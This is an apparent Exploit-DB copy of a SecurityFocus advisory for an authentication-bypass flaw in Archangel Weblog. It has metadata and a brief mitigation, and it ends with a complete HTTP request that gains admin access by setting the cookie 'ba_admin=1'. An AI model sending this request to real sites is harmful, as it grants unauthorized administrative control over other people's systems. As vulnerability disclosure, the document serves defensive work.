Archangel Weblog Authentication Bypass Vulnerability

vendor:

Archangel Weblog

by:

SecurityFocus

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Archangel Weblog

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Archangel Weblog Authentication Bypass Vulnerability

Archangel Weblog is prone to an authentication-bypass vulnerability. This issue is due to a failure in the application to properly validate user-supplied data. An attacker can exploit this issue to bypass the authentication mechanism and gain access to the affected application as an administrative user. This may facilitate a compromise of the underlying system; other attacks are also possible.

Mitigation:

Ensure that user-supplied data is properly validated before being used.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16848/info

Archangel Weblog is prone to an authentication-bypass vulnerability. This issue is due to a failure in the application to properly validate user-supplied data. 

An attacker can exploit this issue to bypass the authentication mechanism and gain access to the affected application as an administrative user. This may facilitate a compromise of the underlying system; other attacks are also possible.

The following example HTTP request is sufficient to exploit this issue:
GET http://www.example.com/awb/admin/index.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051229 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ba_admin=1
Cache-Control: max-age=0